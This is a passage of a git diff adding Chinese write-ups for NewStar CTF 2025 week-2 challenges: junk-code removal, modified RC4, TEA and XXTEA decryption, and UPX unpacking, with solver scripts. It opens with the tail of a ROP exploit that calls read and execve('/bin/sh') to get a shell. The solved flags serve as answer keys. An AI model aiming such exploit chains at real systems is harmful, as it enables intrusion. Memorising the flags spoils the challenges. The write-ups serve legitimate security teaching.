p32(pop_edx)+p32(0x20) +payload += p32(pop_ecx)+p32(bss_addr) +payload += p32(pop_ebx)+p32(0) +payload += p32(int_0x80) #read(0,bss_addr,0x20) +payload += p32(pop_eax)+p32(0xb) +payload += p32(pop_edx)+p32(0) +payload += p32(pop_ecx)+p32(0) +payload += p32(pop_ebx)+p32(bss_addr) +payload += p32(int_0x80) #execve("/bin/sh",0,0) + +io.sendlineafter("pwn it guys!\n",payload) +io.sendline('/bin/sh\x00') +io.interactive() + +``` diff --git a/docs/wp/2025/week2/reverse/flower-1.md b/docs/wp/2025/week2/reverse/flower-1.md new file mode 100644 index 0000000..11177a8 --- /dev/null +++ b/docs/wp/2025/week2/reverse/flower-1.md @@ -0,0 +1,431 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 采一朵花,送给艾达(1) + + + +本题考查简单的花指令分析。 + + +程序主函数: + +```cpp +int __fastcall main(int argc, const char **argv, const char **envp) +{ + _main(argc, argv, envp); + tutorial(); + puts("Now try to solve this problem."); + JUMPOUT(0x140001788LL); +} +``` + +查看教程函数: + +```cpp +void tutorial() +{ + puts("Junk codes are some assembly codes that can obfuscate your disassembler and decompiler."); + puts("They usually use some small tricks to confuse disassembler or change the way of programs running."); + puts("When disassembler try to disassemble the machine codes, it will not execute the code at the same time."); + puts("It will only try to recognize all the data, code by code."); + puts("Therefore, when some special codes exist but will not execute when running, they will confuse the disassembler."); + puts( + "For example, 0xE8(call), 0x74 & 0x75(jz&jnz) will make the disassembler consider that the data after these codes is " + "the address to jump."); + puts( + "However, if these codes are skipped when running(junkcode), the disassembler will not know this. It will make mistakes."); + puts("You can try to PATCH the program (for example NOP the junk codes) and make the real logic appear."); + puts( + "Here are some examples(you can try to patch them and if you can see the next example instead of JUMPOUT, that means you successed):"); + puts("1.use jz & jnz to replace jmp, and use 0xE8 to confuse the disassembler:"); + JUMPOUT(0x1400014F5LL); +} +``` + +实际上教程函数里面写的已经很明白了,花指令就是会干扰反编译器的垃圾字节码,在实际过程中会跳过一些字节不执行,去除花指令的核心方式就是 nop(改为无操作)。 + +第一个花指令: + +```asm +.text:00000001400014F0 jz short near ptr loc_1400014F4+1 +.text:00000001400014F2 jnz short near ptr loc_1400014F4+1 +.text:00000001400014F4 +.text:00000001400014F4 loc_1400014F4: ; CODE XREF: tutorial+A0↑j +.text:00000001400014F4 ; tutorial+A2↑j +.text:00000001400014F4 call near ptr 16405A241h +``` + +很明显这里是不管真假都跳转到 `0x001400014F4 + 1`(即 `0x001400014F5`)的位置,所以要先在 `0x001400014F4` 的位置按 U 取消定义,再在 `0x001400014F5` 位置按 C,后面的部分就可以继续识别了,然后可以把 `jz` + `jnz` + `0xE8` 给 nop 掉。 + +第二个花指令: + +```asm +.text:00000001400014F5 loc_1400014F5: ; CODE XREF: tutorial+A0↑j +.text:00000001400014F5 ; tutorial+A2↑j +.text:00000001400014F5 lea rax, a2UseCallChange ; "2.use call, change esp and return to co"... +.text:00000001400014FC mov rcx, rax ; Buffer +.text:00000001400014FF call puts +.text:0000000140001504 call loc_14000150A +.text:0000000140001504 ; --------------------------------------------------------------------------- +.text:0000000140001509 db 83h +.text:000000014000150A ; --------------------------------------------------------------------------- +.text:000000014000150A +.text:000000014000150A loc_14000150A: ; CODE XREF: tutorial+B4↑j +.text:000000014000150A db 36h +.text:000000014000150A add [rsp+20h+var_20], 8 +.text:000000014000150F retn +.text:000000014000150F ; --------------------------------------------------------------------------- +.text:0000000140001510 db 0F3h +.text:0000000140001511 db 48h ; H +.text:0000000140001512 db 8Dh +``` + +这里是一个修改了返回地址的花指令,call 了下面的代码后改了返回地址,经过计算可以得到返回到 `0x00140001511` 的位置,即使不计算也可以试试从 `0x00140001510` 开始往下按 C,按到 `0x00140001511` 的时候能成功识别,然后把 `0x00140001504` ~ `0x00140001510` 都 nop 掉即可 + +第三个花指令: + +```asm +.text:0000000140001511 lea rax, a3MixedOrOther ; "3.mixed or other: " +.text:0000000140001518 mov rcx, rax ; Buffer +.text:000000014000151B call puts +.text:0000000140001520 xor eax, eax +.text:0000000140001522 +.text:0000000140001522 loc_140001522: ; CODE XREF: tutorial+E1↓j +.text:0000000140001522 jz short loc_14000152F +.text:0000000140001524 +.text:0000000140001524 loc_140001524: ; CODE XREF: tutorial:loc_140001524↑j +.text:0000000140001524 jz short near ptr loc_140001524+1 +.text:0000000140001526 jnz short near ptr loc_140001528+1 +.text:0000000140001528 +.text:0000000140001528 loc_140001528: ; CODE XREF: tutorial+D6↑j +.text:0000000140001528 ; tutorial:loc_14000152F↓j +.text:0000000140001528 call near ptr 141E81DA1h +.text:000000014000152D retn +.text:000000014000152D ; --------------------------------------------------------------------------- +.text:000000014000152E db 0E8h +.text:000000014000152F ; --------------------------------------------------------------------------- +.text:000000014000152F +.text:000000014000152F loc_14000152F: ; CODE XREF: tutorial:loc_140001522↑j +.text:000000014000152F jz short near ptr loc_140001528+1 +.text:0000000140001531 jnz short near ptr loc_140001522+1 +.text:0000000140001533 nop +.text:0000000140001534 add rsp, 20h +.text:0000000140001538 pop rbp +.text:0000000140001539 retn +``` + +这是一个很复杂的复合花指令,有很多跳转,但是和之前一样,一点一点分析其跳转到了什么地方,然后对有 +1 这种偏移量的位置按 U 取消定义,再在偏移量的地方重新按 C(比如 `loc_140001524 + 1`,那就在 `0x00140001524` 按 U,`0x00140001525` 按 C,之后把从 `0x00140001522` 的地方到 `0x00140001533` 的地方全部 nop 掉就行了,此时函数终于可以正常反编译: + +```cpp +void tutorial() +{ + puts("Junk codes are some assembly codes that can obfuscate your disassembler and decompiler."); + puts("They usually use some small tricks to confuse disassembler or change the way of programs running."); + puts("When disassembler try to disassemble the machine codes, it will not execute the code at the same time."); + puts("It will only try to recognize all the data, code by code."); + puts("Therefore, when some special codes exist but will not execute when running, they will confuse the disassembler."); + puts( + "For example, 0xE8(call), 0x74 & 0x75(jz&jnz) will make the disassembler consider that the data after these codes is " + "the address to jump."); + puts( + "However, if these codes are skipped when running(junkcode), the disassembler will not know this. It will make mistakes."); + puts("You can try to PATCH the program (for example NOP the junk codes) and make the real logic appear."); + puts( + "Here are some examples(you can try to patch them and if you can see the next example instead of JUMPOUT, that means you successed):"); + puts("1.use jz & jnz to replace jmp, and use 0xE8 to confuse the disassembler:"); + puts("2.use call, change esp and return to confuse the disassembler:"); + puts("3.mixed or other: "); +} +``` + +此时再查看 `main`: + +```asm +.text:0000000140001781 xor eax, eax +.text:0000000140001783 jz short near ptr loc_140001787+1 +.text:0000000140001785 jnz short near ptr loc_140001787+1 +.text:0000000140001787 +.text:0000000140001787 loc_140001787: ; CODE XREF: main+2B↑j +.text:0000000140001787 ; main+2D↑j +.text:0000000140001787 call near ptr 14805A4D4h +.text:000000014000178C sub eax, 89480000h +``` + +和之前的第一条方法一样,从 `0x00140001783` 到 `0x00140001787` nop (`0x00140001788` 不 nop): + +```asm +.text:0000000140001781 xor eax, eax +.text:0000000140001783 nop +.text:0000000140001784 nop +.text:0000000140001785 nop +.text:0000000140001786 nop +.text:0000000140001787 nop +.text:0000000140001788 lea rax, aInputYourFlag ; "Input your flag: " +``` + +第二个花指令: + +```asm +.text:0000000140001804 loc_140001804: ; CODE XREF: main+82↑j +.text:0000000140001804 xor eax, eax +.text:0000000140001806 jz short near ptr loc_14000180F+3 +.text:0000000140001808 jnz short near ptr loc_14000180F+3 +.text:000000014000180A call near ptr 14874DB10h +.text:000000014000180F +.text:000000014000180F loc_14000180F: ; CODE XREF: main+AE↑j +.text:000000014000180F ; main+B0↑j +.text:000000014000180F call near ptr 13974DB15h +.text:0000000140001814 call near ptr 0F848DB1Ah +.text:0000000140001814 ; --------------------------------------------------------------------------- +.text:0000000140001819 db 0C7h, 7Fh, 0C1h, 43h, 3, 64h, 75h +.text:0000000140001820 ; --------------------------------------------------------------------------- +.text:0000000140001820 adc [rax-77h], ecx +.text:0000000140001823 mov al, ds:0C0F6558CB888B848h +``` + +和之前的第三种一样,仔细追踪跳转并修改定义为代码的部分就行: + +```asm +.text:0000000140001804 loc_140001804: ; CODE XREF: main+82↑j +.text:0000000140001804 xor eax, eax +.text:0000000140001806 jz short loc_140001812 +.text:0000000140001808 jnz short loc_140001812 +.text:0000000140001808 ; --------------------------------------------------------------------------- +.text:000000014000180A db 0E8h +.text:000000014000180B db 1 +.text:000000014000180C db 0C3h +.text:000000014000180D ; --------------------------------------------------------------------------- +.text:000000014000180D +.text:000000014000180D loc_14000180D: ; CODE XREF: main:loc_140001812↓j +.text:000000014000180D jz short loc_140001817 +.text:000000014000180D ; --------------------------------------------------------------------------- +.text:000000014000180F db 0E8h +.text:0000000140001810 db 1 +.text:0000000140001811 db 0C3h +.text:0000000140001812 ; --------------------------------------------------------------------------- +.text:0000000140001812 +.text:0000000140001812 loc_140001812: ; CODE XREF: main+AE↑j +.text:0000000140001812 ; main+B0↑j +.text:0000000140001812 jz short loc_14000180D +.text:0000000140001812 ; --------------------------------------------------------------------------- +.text:0000000140001814 db 0E8h +.text:0000000140001815 db 1 +.text:0000000140001816 db 0C3h +.text:0000000140001817 ; --------------------------------------------------------------------------- +.text:0000000140001817 +.text:0000000140001817 loc_140001817: ; CODE XREF: main:loc_14000180D↑j +.text:0000000140001817 mov rax, 1175640343C17FC7h +``` + +之后把这些跳转全部 nop 掉,反编译: + +```cpp +int __fastcall main(int argc, const char **argv, const char **envp) +{ + _QWORD v4[6]; // [rsp+20h] [rbp-60h] + _BYTE v5[256]; // [rsp+50h] [rbp-30h] BYREF + _BYTE v6[1036]; // [rsp+150h] [rbp+D0h] BYREF + unsigned int v7; // [rsp+55Ch] [rbp+4DCh] + char *v8; // [rsp+560h] [rbp+4E0h] + unsigned int v9; // [rsp+56Ch] [rbp+4ECh] + char *Str; // [rsp+570h] [rbp+4F0h] + int i; // [rsp+57Ch] [rbp+4FCh] + + _main(argc, argv, envp); + tutorial(); + puts("Now try to solve this problem."); + printf("Input your flag: "); + Str = (char *)malloc(0x64u); + scanf("%s", Str); + v9 = strlen(Str); + if ( v9 == 40 ) + { + v4[0] = 0x1175640343C17FC7LL; + v4[1] = 0xDF23C0F6558CB888uLL; + v4[2] = 0xF2F082F69E2E0F4DuLL; + v4[3] = 0xE1278329086B51BCuLL; + v4[4] = 0x4E4F80B188C6BDCBLL; + v8 = "EasyJunkCodes"; + v7 = strlen("EasyJunkCodes"); + rc4_init(v5, "EasyJunkCodes", v7); + memcpy(v6, Str, (int)v9); + rc4_crypt(v5, v6, v9); + for ( i = 0; i < (int)v9; ++i ) + { + if ( v6[i] != *((_BYTE *)v4 + i) ) + { + printf("Wrong flag!"); + free(Str); + return 0; + } + } + printf("Right flag!"); + free(Str); + return 0; + } + else + { + printf("Wrong length!"); + free(Str); + return 114514; + } +} +``` + +可以看到密文 `v4`,密钥 `v8`,加密算法 RC4,查看 `RC4_init`: + +```cpp +void __fastcall rc4_init(__int64 a1) +{ + int i; // [rsp+Ch] [rbp-4h] + + for ( i = 0; i <= 255; ++i ) + *(_BYTE *)(i + a1) = -(char)i; + JUMPOUT(0x140001589LL); +} +``` + +有花,继续去花 + +```cpp +__int64 __fastcall rc4_init(unsigned __int8 *a1, unsigned __int8 *a2, int a3) +{ + __int64 result; // rax + unsigned __int8 v4; // [rsp+7h] [rbp-9h] + int v5; // [rsp+8h] [rbp-8h] + int i; // [rsp+Ch] [rbp-4h] + int j; // [rsp+Ch] [rbp-4h] + + v5 = 0; + for ( i = 0; i <= 255; ++i ) + a1[i] = -(char)i; + result = 0; + for ( j = 0; j <= 255; ++j ) + { + v5 = (a1[j] + v5 + a2[j % a3]) % 256; + v4 = a1[j]; + a1[j] = a1[v5]; + result = v4; + a1[v5] = v4; + } + return result; +} +``` + +可以看到 S 盒初始化的地方被魔改,继续查看 PRGA: + +```cpp +__int64 __fastcall rc4_crypt(__int64 a1, __int64 a2, int a3) +{ + __int64 result; // rax + char v4; // [rsp+3h] [rbp-Dh] + int v5; // [rsp+8h] [rbp-8h] + + result = 0; + if ( a3 > 0 ) + { + v5 = *(unsigned __int8 *)(a1 + 1) % 256; + v4 = *(_BYTE *)(a1 + 1); + *(_BYTE *)(a1 + 1) = *(_BYTE *)(a1 + v5); + *(_BYTE *)(v5 + a1) = v4; + JUMPOUT(0x140001710LL); + } + return result; +} +``` + +也有花,继续去花。 + +```cpp +__int64 __fastcall rc4_crypt(unsigned __int8 *a1, unsigned __int8 *a2, int a3) +{ + __int64 result; // rax + unsigned __int8 v4; // [rsp+3h] [rbp-Dh] + int i; // [rsp+4h] [rbp-Ch] + int v6; // [rsp+8h] [rbp-8h] + int v7; // [rsp+Ch] [rbp-4h] + + v7 = 0; + v6 = 0; + for ( i = 0; ; ++i ) + { + result = (unsigned int)i; + if ( i >= a3 ) + break; + v7 = (v7 + 1) % 256; + v6 = (a1[v7] + v6) % 256; + v4 = a1[v7]; + a1[v7] = a1[v6]; + a1[v6] = v4; + a2[i] += a1[(unsigned __int8)(a1[v7] + a1[v6])]; + } + return result; +} +``` + +可以发现尾部改成了加号,一共只有这两个魔改点,提取密文密钥编写脚本同构: + +```py +def rc4_init(key): + S = list(range(256)) + for i in range(256): + S[i] = (256 - i) & 0xFF + j = 0 + for i in range(256): + j = (j + S[i] + key[i % len(key)]) % 256 + S[i], S[j] = S[j], S[i] + return S + +def rc4_encrypt_decrypt(data, key): + S = rc4_init(key) + i = 0 + j = 0 + result = bytearray() + for byte in data: + i = (i + 1) % 256 + j = (j + S[i]) % 256 + S[i], S[j] = S[j], S[i] + K = S[(S[i] + S[j]) % 256] + result.append((byte + K)&0xFF) + return bytes(result) +``` + +把结尾的加号改为减号即可实现解密。 + +```py +def rc4_init(key): + S = list(range(256)) + for i in range(256): + S[i] = (256 - i) & 0xFF + j = 0 + for i in range(256): + j = (j + S[i] + key[i % len(key)]) % 256 + S[i], S[j] = S[j], S[i] + return S + +def rc4_encrypt_decrypt(data, key): + S = rc4_init(key) + i = 0 + j = 0 + result = bytearray() + for byte in data: + i = (i + 1) % 256 + j = (j + S[i]) % 256 + S[i], S[j] = S[j], S[i] + K = S[(S[i] + S[j]) % 256] + result.append((byte - K)&0xFF) + return bytes(result) + +plaintext = bytearray.fromhex("c77fc1430364751188b88c55f6c023df4d0f2e9ef682f0f2bc516b08298327e1cbbdc688b1804f4e") +key = b"EasyJunkCodes" +ciphertext = rc4_encrypt_decrypt(plaintext, key) +print(ciphertext) +``` + +最后的 flag 是 `flag{Junk_C0d3s_4Re_345y_t0_rEc0gn1Ze!!}`。 diff --git a/docs/wp/2025/week2/reverse/forgotten-code.md b/docs/wp/2025/week2/reverse/forgotten-code.md new file mode 100644 index 0000000..e067a8c --- /dev/null +++ b/docs/wp/2025/week2/reverse/forgotten-code.md @@ -0,0 +1,96 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# Forgotten_Code + + + +本题考查简单的汇编分析,及 `.s` 文件编译成可执行文件的过程。 + + +附件是一个 `.s` 文件。 + +> [!INFO] > **.s 文件是什么?** +> +> 是 GCC 编译器从 C/C++ 源代码生成的汇编源代码文件。它包含了低级指令(x86 汇编),但还是可读的文本形式。GCC 的编译过程包括预处理、编译(生成 .s)、汇编(生成 .o)和链接(生成可执行文件)。 + +用 `gcc chal.s -o chal` 将 `.s` 文件汇编并链接成可执行文件 chal 后,拖入 IDA 分析。 + +```cpp +unsigned int *__fastcall fn(unsigned int *a1) +{ + unsigned int *result; // rax + unsigned int j; // [rsp+1Ch] [rbp-14h] + int v3; // [rsp+20h] [rbp-10h] + unsigned int v4; // [rsp+24h] [rbp-Ch] + unsigned int v5; // [rsp+28h] [rbp-8h] + int i; // [rsp+2Ch] [rbp-4h] + + for ( i = 0; i <= 15; ++i ) + *((_BYTE *)ng + i) ^= 0x11u; + v5 = *a1; + v4 = a1[1]; + v3 = 0; + for ( j = 0; j <= 31; ++j ) + { + v3 -= 0x61C88647; + v5 += (v4 + v3) ^ (ng[0] + 16 * v4) ^ ((v4 >> 5) + ng[1]); + v4 += (v5 + v3) ^ (ng[2] + 16 * v5) ^ ((v5 >> 5) + ng[3]); + } + *a1 = v5; + result = a1 + 1; + a1[1] = v4; + return result; +} +``` + +可以看到加密过程是一个 TEA 加密,不过每次加密的前会对密钥的每一个字节异或 `0x11`。 + +Exploit 如下: + +```cpp +#include +#include + +char key[] = {0x73, 0x70, 0x7f, 0x76, 0x75, 0x63, 0x74, 0x70, + 0x7c, 0x78, 0x65, 0x62, 0x7c, 0x68, 0x76, 0x7e}; + +unsigned int cipher[] = {0x482550ff, 0x2a60a11e, 0xfa9d5db7, 0x8b4b2a10, + 0xd38d2d8e, 0x04092276, 0xfad7e1ba, 0x98f9c1b9}; + +void tea_decrypt(unsigned int* v) { + // 和加密流程一样,先处理密钥 + for (int i = 0; i < 16; i++) { key[i] ^= 0x11; } + + // 后面进入标准的 TEA 解密 + unsigned int v0 = v[0], v1 = v[1], sum = 0x9e3779b9 * 32, i; + unsigned int delta = 0x9e3779b9; + + for (i = 0; i < 32; i++) { + unsigned int k0 = ((unsigned int*)key)[0], k1 = ((unsigned int*)key)[1], + k2 = ((unsigned int*)key)[2], k3 = ((unsigned int*)key)[3]; + v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3); + v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1); + + sum -= delta; + } + v[0] = v0; + v[1] = v1; +} + +int main() { + for (int i = 0; i < 4; i++) { tea_decrypt(cipher + 2 * i); } + + printf("flag{"); + for (int i = 0; i < 32; i++) { printf("%c", ((char*)cipher)[i]); } + printf("}\n"); + return 0; +} + +// flag{4553m81y_5_s0o0o0_345y_jD5yQ5mD9} +``` diff --git a/docs/wp/2025/week2/reverse/look-carefully.md b/docs/wp/2025/week2/reverse/look-carefully.md new file mode 100644 index 0000000..9396edf --- /dev/null +++ b/docs/wp/2025/week2/reverse/look-carefully.md @@ -0,0 +1,51 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# Look at me carefully + + + +本题考查对经过混淆后的代码的理解。 + + +首先打开 `main` 函数分析,发现 `sub_4016E0` 这个函数的调用似乎很多 + +![main 函数分析](/assets/images/wp/2025/week2/look-carefully_1.png) + +函数内部插入了大量的无意义的混淆代码,静态很难分析。 + +![混淆代码](/assets/images/wp/2025/week2/look-carefully_2.png) + +其实我们可以动态调试观察函数的两个参数指针的变化。~~根据题目提示其实这道题是不需要仔细看其中的逻辑的~~ + +首先我们输入 `abcdefghijklmnopqrstuvwxyz0123456789`,用于比较的是我们函数的第一个参数,我们在下方内存窗口跳转过去,然后观察内存变化。 + +![动态调试](/assets/images/wp/2025/week2/look-carefully_3.png) + +我们执行了几个函数,观察内存窗口,发现该内存多了如下输入 `1fgj2s63`,根据和输入的观察发现是从输入中按照一定的顺序取出字符放到新的一片内存中,而顺序就是函数的第三个参数,而数组下标超出输入的长度的函数是不会进行取输入操作的。 + +![内存变化](/assets/images/wp/2025/week2/look-carefully_4.png) + +所以我们可以根据这个规则逆推出 flag + +```python +# 目标字符串 +target = list("cH4_1elo{ookte?0dv_}alafle___5yygume??") +order = [ + 27, 5, 6, 9, 28, 18, 32, 29, 4, 11, 15, 17, 22, 8, 34, 16, 19, 7, 26, 35, + 2, 14, 21, 0, 1, 25, 13, 23, 20, 30, 33, 10, 3, 12, 24, 31 +] + +flag = [''] * 36 +for i, idx in enumerate(order): + flag[idx] = target[i] + +print("".join(flag)) +``` + +得到flag:`flag{H4ve_you_lo0ked_at_me_c1o5ely?}`。 diff --git a/docs/wp/2025/week2/reverse/ohnativeenc.md b/docs/wp/2025/week2/reverse/ohnativeenc.md new file mode 100644 index 0000000..9626310 --- /dev/null +++ b/docs/wp/2025/week2/reverse/ohnativeenc.md @@ -0,0 +1,177 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# OhNativeEnc + + + +本题考查对 Android 原生加密函数的逆向分析。 + + +和 Week1 的安卓一样寻找加密。 + +![寻找加密逻辑](/assets/images/wp/2025/week2/ohnativeenc_1.png) + +但是加密函数是 `native` 的,说明加密函数在 `so` 文件里。 + +![加密函数寻找](/assets/images/wp/2025/week2/ohnativeenc_2.png) + +`.apk` 后缀改成 `.zip` 打开,把 `lib\arm64-v8a\libohnativeenc.so` 解压出来,用 `IDA` 打开。 + +找到 ` Java_work_pangbai_ohnativeenc_FirstFragment_checkFlag` 函数。 + +```cpp +bool __fastcall Java_work_pangbai_ohnativeenc_FirstFragment_checkFlag(__int64 a1, __int64 a2, __int64 a3) +{ + const char *src; // x19 + unsigned int v4; // w8 + unsigned int v5; // w10 + unsigned int v6; // w9 + unsigned int v7; // w11 + unsigned int dest__1; // w12 + unsigned int v9; // w13 + unsigned int v10; // w14 + unsigned int v11; // w15 + int v12; // w16 + unsigned int n0x1BF52; // w17 + int v14; // w1 + int v15; // w2 + int v16; // w4 + bool v17; // cf + int v18; // w5 + int v19; // w1 + int v20; // w1 + unsigned __int64 n31; // x10 + unsigned __int64 n0x1E; // x9 + int v23; // w11 + int v24; // w12 + __int128 dest_; // [xsp+0h] [xbp-30h] BYREF + __int128 v27; // [xsp+10h] [xbp-20h] + __int64 v28; // [xsp+28h] [xbp-8h] + + v28 = *(_QWORD *)(_ReadStatusReg(ARM64_SYSREG(3, 3, 13, 0, 2)) + 40); + src = (const char *)(*(__int64 (__fastcall **)(__int64, __int64, _QWORD))(*(_QWORD *)a1 + 1352LL))(a1, a3, 0LL); + __android_log_print(4, "native", "input:%s", src); + dest_ = 0u; + v27 = 0u; + strncpy((char *)&dest_, src, 0x20uLL); + v4 = v27; + v5 = DWORD1(v27); + v7 = DWORD2(v27); + v6 = HIDWORD(v27); + dest__1 = dest_; + v9 = DWORD1(dest_); + v11 = DWORD2(dest_); + v10 = HIDWORD(dest_); + v12 = -12; + n0x1BF52 = 0x1BF52; + do + { + v14 = (n0x1BF52 >> 2) & 3; + v15 = *(_DWORD *)&aThisisaxxteake[4 * v14]; + v16 = *(_DWORD *)&aThisisaxxteake[4 * (v14 ^ 1)]; + v17 = __CFADD__(v12++, 1); + dest__1 += (((4 * v9) ^ (v6 >> 5)) + ((v9 >> 3) ^ (16 * v6))) ^ ((v15 ^ v6) + (v9 ^ n0x1BF52)); + v18 = *(_DWORD *)&aThisisaxxteake[4 * (v14 ^ 2)]; + v9 += (((4 * v11) ^ (dest__1 >> 5)) + ((v11 >> 3) ^ (16 * dest__1))) ^ ((v16 ^ dest__1) + (v11 ^ n0x1BF52)); + v19 = *(_DWORD *)&aThisisaxxteake[4 * (v14 ^ 3)]; + v11 += (((4 * v10) ^ (v9 >> 5)) + ((v10 >> 3) ^ (16 * v9))) ^ ((v18 ^ v9) + (v10 ^ n0x1BF52)); + v10 += (((4 * v4) ^ (v11 >> 5)) + ((v4 >> 3) ^ (16 * v11))) ^ ((v19 ^ v11) + (v4 ^ n0x1BF52)); + v4 += (((4 * v5) ^ (v10 >> 5)) + ((v5 >> 3) ^ (16 * v10))) ^ ((v15 ^ v10) + (v5 ^ n0x1BF52)); + v5 += (((4 * v7) ^ (v4 >> 5)) + ((v7 >> 3) ^ (16 * v4))) ^ ((v16 ^ v4) + (v7 ^ n0x1BF52)); + v7 += (((4 * v6) ^ (v5 >> 5)) + ((v6 >> 3) ^ (16 * v5))) ^ ((v18 ^ v5) + (v6 ^ n0x1BF52)); + v20 = (((4 * dest__1) ^ (v7 >> 5)) + ((dest__1 >> 3) ^ (16 * v7))) ^ ((v19 ^ v7) + (dest__1 ^ n0x1BF52)); + n0x1BF52 += 114514; + v6 += v20; + } + while ( !v17 ); + *(_QWORD *)&dest_ = __PAIR64__(v9, dest__1); + *((_QWORD *)&dest_ + 1) = __PAIR64__(v10, v11); + *(_QWORD *)&v27 = __PAIR64__(v5, v4); + *((_QWORD *)&v27 + 1) = __PAIR64__(v6, v7); + if ( (unsigned __int8)mm[0] != (unsigned __int8)dest__1 ) + return 0LL; + n31 = 0LL; + do + { + n0x1E = n31; + if ( n31 == 31 ) + break; + v23 = *((unsigned __int8 *)&dest_ + n31 + 1); + v24 = (unsigned __int8)mm[++n31]; + } + while ( v23 == v24 ); + return n0x1E > 0x1E; +} +``` + +可以分析一下操作,`mm` 是密文,其实就是一个 **flag 块**加上 另一个 **flag 的加密块** 的循环,看 `key` 的内容也可以知道这是 xxtea 加密。 + +可以网上找个 xxtea 算法,把 `delta` 改为题目相同的值就行了。 + +```c +#include +#define DELTA 114514 +#define MX (((z >> 5 ^ y << 2) + (y >> 3 ^ z << 4)) ^ ((sum ^ y) + (key[(p & 3) ^ e] ^ z))) +// 容易魔改 +void btea(uint32_t *v, int n, uint32_t const key[4]) +{ + // v 为数据,n 为数据长度 (负时为解密),key 为密钥 + uint32_t y, z, sum; + unsigned p, rounds, e; + if (n > 1) + /* Coding Part */ + { + rounds = 6 + 52 / n; + sum = 0; + z = v[n - 1]; + do + { + sum += DELTA; + e = (sum >> 2) & 3; + for (p = 0; p < n - 1; p++) + { + y = v[p + 1]; + z = v[p] += MX; + } + y = v[0]; + z = v[n - 1] += MX; + } while (--rounds); + } + else if (n < -1) + /* Decoding Part */ + { + n = -n; + rounds = 6 + 52 / n; + sum = rounds * DELTA; + y = v[0]; + do + { + e = (sum >> 2) & 3; + for (p = n - 1; p > 0; p--) + { + z = v[p - 1]; + y = v[p] -= MX; + } + z = v[n - 1]; + y = v[0] -= MX; + sum -= DELTA; + } while (--rounds); + } +} + +int main(int argc, char **argv) +{ + + unsigned char key[16] = "ThisIsAXXteaKey"; + unsigned char mm[] = {0xb6, 0x53, 0x6e, 0x4d, 0x77, 0x5d, 0x08, 0xd2, 0xfb, 0x2c, 0x63, 0x1e, 0xbb, 0x7b, 0x01, 0x9b, 0xf5, 0x04, 0x6a, 0xf4, 0x0e, 0x84, 0x27, 0x47, 0x64, 0xa1, 0xe4, 0xd9, 0xef, 0x12, 0x44, 0x37}; + btea((uint32_t *)mm, -8, (uint32_t *)key); + puts(mm); + return 0; +} +``` diff --git a/docs/wp/2025/week2/reverse/upx-1.md b/docs/wp/2025/week2/reverse/upx-1.md new file mode 100644 index 0000000..ab3e2a4 --- /dev/null +++ b/docs/wp/2025/week2/reverse/upx-1.md @@ -0,0 +1,161 @@ +--- +titleTemplate: ":title | WriteUp - NewStar CTF 2025" +--- + + + +# 尤皮·埃克斯历险记(1) + + + +本题考查 UPX 脱壳及反调试。 + + +将 exe 拖入 IDA 之后发现主函数不见了,程序只有一两个函数,再用 DIE 或者 exeinfope 查壳,发现有 UPX 壳。 + +`upx -d` 可以脱壳。 + +脱壳后查看主函数: + +```cpp +int __fastcall main(int argc, const char **argv, const char **envp) +{ + __int64 n34_1; // rax + std::ostream *v4; // rax + unsigned __int64 v5; // rax + std::ostream *v6; // rax + _BYTE v8[32]; // [rsp+20h] [rbp-60h] BYREF + _BYTE v9[2]; // [rsp+40h] [rbp-40h] BYREF + _BYTE v10[16]; // [rsp+50h] [rbp-30h] BYREF + _BYTE v11[22]; // [rsp+60h] [rbp-20h] BYREF + char v12; // [rsp+76h] [rbp-Ah] + char v13; // [rsp+77h] [rbp-9h] + __int64 n34; // [rsp+78h] [rbp-8h] + unsigned __int64 i; // [rsp+80h] [rbp+0h] + char v16; // [rsp+8Fh] [rbp+Fh] + + _main(); + qmemcpy(v8, "isfhGJ\tt~cU\ny\nuTjcj\tT~cjQdu~w{", 30); + v8[30] = 4; + v8[31] = 5; + qmemcpy(v9, "qA", sizeof(v9)); + n34 = 34; + std::string::string((std::string *)v11); + std::operator<<>(refptr__ZSt4cout, "Enter your flag: "); + std::operator>>(refptr__ZSt3cin, (std::string *)v11); + encrypt((const std::string *)v10); + n34_1 = std::string::length((std::string *)v10); + if ( n34_1 == n34 ) + { + v16 = 1; + for ( i = 0; ; ++i ) + { + v5 = std::string::length((std::string *)v10); + if ( v5 <= i ) + break; + if ( IsDebuggerPresent() ) + { + v12 = *(_BYTE *)std::string::operator[](v10, i) ^ 0xC3; + if ( v8[i] != v12 ) + { + v16 = 0; + break; + } + } + else + { + v13 = *(_BYTE *)std::string::operator[](v10, i) ^ 0x3C; + if ( v8[i] != v13 ) + { + v16 = 0; + break; + } + } + } + if ( v16 ) + v6 = (std::ostream *)std::operator<<>(refptr__ZSt4cout, "Right!"); + else + v6 = (std::ostream *)std::operator<<>(refptr__ZSt4cout, "Wrong!"); + refptr__ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_(v6); + } + else + { + v4 = (std::ostream *)std::operator<<>(refptr__ZSt4cout, "Wrong!"); + refptr__ZSt4endlIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_(v4); + } + std::string::~string((std::string *)v10); + std::string::~string((std::string *)v11); + return 0; +} +``` + +发现给出了密文,还有一个 `encrypt` 函数: + +```cpp +__int64 __fastcall encrypt(__int64 a1, __int64 a2) +{ + unsigned __int64 i_1; // rax + char v4; // [rsp+27h] [rbp-19h] BYREF + char *v5; // [rsp+28h] [rbp-18h] + char C; // [rsp+37h] [rbp-9h] + unsigned __int64 i; // [rsp+38h] [rbp-8h] + + v5 = &v4; + std::string::basic_string>(a1, &unk_1400C7000, &v4); + std::__new_allocator::~__new_allocator(&v4); + for ( i = 0; ; ++i ) + { + i_1 = std::string::length(a2); + if ( i >= i_1 ) + break; + C = *(_BYTE *)std::string::operator[](a2, i); + if ( (unsigned int)(C - 48) > 9 ) + { + if ( islower(C) || isupper(C) ) + std::string::operator+=(a1, (unsigned int)(char)(0xBB - C)); + else + std::string::operator+=(a1, (unsigned int)C); + } + else + { + std::string::operator+=(a1, (unsigned int)(char)(0x69 - C)); + } + } + return a1; +} +``` + 